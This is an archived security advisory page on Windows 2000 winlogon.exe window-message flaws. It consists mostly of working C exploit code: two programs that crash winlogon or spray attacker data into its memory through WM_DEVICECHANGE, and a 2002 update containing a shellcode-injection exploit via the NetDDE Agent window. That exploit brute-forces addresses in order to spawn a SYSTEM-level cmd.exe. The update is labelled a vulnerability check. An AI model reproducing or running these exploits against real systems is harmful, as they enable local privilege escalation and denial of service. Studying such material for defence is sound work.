TUCoPS :: Windows :: win2016.htm

Win2000 WinLogin two exploits
16th Feb 2001 [SBWID-2016]
COMMAND

	    winlogon

	

	

SYSTEMS AFFECTED

	    Win2000

	

	

PROBLEM

	    'ryagin'  found  following.   As  well  as  recent  "NetDDE Agent"

	    window hosted by winlogon.exe, there  is one another window:   "MM

	    Notify Callback".  It is hosted by winmm.dll which is loaded  into

	    winlogon.exe.

	

	    Windows  procedure  seems  to  handle  few  messages,   WM_CREATE,

	    WM_DESTROY,  WM_CLOSE,  WM_TIMER,   and,  the  most   interesting,

	    WM_DEVICECHANGE.

	

	    The  primary  role  of  WM_DEVICECHANGE  message  is informing the

	    user-space  environment  about  device  plug/unplug  and   related

	    issues.

	

	    The "MM Notify Callback" window analyses only "MM Notify Callback"

	    DBT_DEVICEARRIVAL [0x8000]  and DBT_DEVICEREMOVECOMPLETE  [0x8004]

	    sub-messages (arriving from wParam).

	

	    When it gots this messages, it reads data structure,  interpreting

	    lParam as pointer.  Data  structure must have value 0x00000005  at

	    offset+0x4 and  must have  special GUID  value at  offset+0xC, and

	    must have null-terminated uncode string ot offset+0x1C.

	

	    This  issue  most  probably  cannot  serve for executing code with

	    SYSTEM  priveleges,  but  this  requires  more  accurate research.

	    Quick look at winmm.dll code shows that supplied structure doesn't

	    used in copy operations into random memory addresses, however, you

	    can  fill  region  of  winlogon's  memory  with  practically   any

	    user-supplied data  (the only  prohibited value  is unicode 0x0000

	    string terminator).

	

	    This can  be used  as shellcode  for another  winlogon's bug,  for

	    example.   Nevertheless,  by  running  exploit  from the bottom of

	    message, you can crash winlogon.exe with access violation.

	

	    Thus have little value for ordinary Workstations and Servers,  but

	    can be used to DoS against Terminal Servers.

	

	    Exploit 1: crashes winlogon with access violation

	    Exploit 2: inject data string of 'ABCD' x 0x1000 (in unicode) into

	               winlogon memory space

	
	    ----- exploit 1-------

	    #include <windows.h>

	    #include <stdio.h>

	    

	    DWORD exploit[]={0x11223344,0x5, 0x55667788,

	      0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9

	    };

	    

	    int main()

	    {

	      HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");

	      printf("Window=%x\n",hwnd);

	      SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,0x00000000);

	      // 							  ^^^^^^^^^^ AV address

	      return 0;

	    }

	    

	    ----- exploit 2-------

	    #include <windows.h>

	    #include <stdio.h>

	    

	    DWORD exploit[]={0x11223344,0x5, 0x55667788,

	      0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9

	    };

	    

	    int main()

	    {

	      DWORD *ptr;

	      DWORD i,j;

	      HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");

	      printf("Window=%x\n",hwnd);

	      ptr = (DWORD*)malloc(0x1000*4+sizeof(exploit));

	      for(i=0;i<sizeof(exploit)/sizeof(exploit[0]);i++)

	        ptr[i]=exploit[i];

	    

	      for(j=0;j<0x1000;j++) ptr[i+j]='ABCD';

	    

	    

	      SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,(DWORD)ptr);

	      return 0;

	    }

	

	

	 Update (21 October 2002)

	 ======

	

	Exploit W2K sp1-sp3 ...
	

	

	//

	/////////// Copyright © 2002  Serus ////////////////

	//mailto:serus@users.mns.ru

	//

	//This program check system on winlogon bug present

	//Only for Windows 2000

	//This is for check use only!

	//

	

	#include <windows.h>

	#include <stdio.h>

	

	

	void main(int argc, char *argv[ ], char *envp[ ] )

	{

		char	*buf;

		DWORD	Addr = 0;

		BOOL	bExec = TRUE;

	

		unsigned char sc[] = {	// my simple shellcode, it calls CreateProcess function,

								// executes cmd.exe on user`s desktop and creates mutex.

			0x8B, 0xF4,

			0x68, 0x53, 0x45, 0x52, 0x00,

			0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,

			0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,

		    0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00, 

			0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,

			0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69, 

			0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,  

			0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,

			0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08, 

			0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,

			0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4,

			0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3

		};

	

		HWND			hWnd;

		COPYDATASTRUCT	cds;

		HMODULE			hMod;

		DWORD			ProcAddr;

		HANDLE			hMutex;

		char			mutname[4];

	

		printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ====");

	

		// Get NetDDE Window

		hWnd = FindWindow("NDDEAgnt","NetDDE Agent");

		if(hWnd == NULL) 

		{

			MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);

			return;

		}

	

		// Get CreateProcessA and CreateMutexA entry addresses

		hMod = GetModuleHandle("kernel32.dll");

		ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");

	

		if(ProcAddr == 0)

		{

			MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);

			return;

		}

		*(DWORD *)(sc + 86 + 21) = ProcAddr;

	

		ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");

		if(ProcAddr == 0)

		{

			MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);

			return;

		}

		*(DWORD *)(sc + 15) = ProcAddr;

	

		//Generate random Mutex name

		srand(GetTickCount());

	

		do

		{

			mutname[0] = 97 + rand()%25;

			mutname[1] = 65 + rand()%25;

			mutname[2] = 65 + rand()%25;

			mutname[3] = 0;

		}

		while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);

		memcpy(sc + 3, mutname, 4);

	

		//Form buffer for SendMessage

		buf = (char *)malloc(1000);

		memset(buf, 0xC3, 1000);

		memcpy(buf, sc, sizeof(sc));

	

		cds.cbData = 1000;

		cds.dwData = 0;

		cds.lpData=(PVOID)buf;

	

		//If first login

		//Send shellcode buffer

		SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);

		//Try execute it at 0x0080FA78

		PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78);

		printf("\n\nTrying at 0x%X", 0x0080FA78);

	

		//If fails (perhaps not first login)

		//Try to bruteforce shellcode addresss

		for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)

		{

			//If mutex exists, shellcode has been executed

			if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)

			{

				//Success

				printf("\nSuccess!!!\n");

				printf("\nWarning! You system has vulnerability!\n");

				CloseHandle(hMutex);

				return;

			}

			printf("\rTrying at 0x%X", Addr);

	

			SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);

			PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);

		}

	

		//Bug in winlogon not presents

		printf("\n\nBad luck! Reboot and try again.\n\n");

	

	}

	

SOLUTION

	    Nothing yet.

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH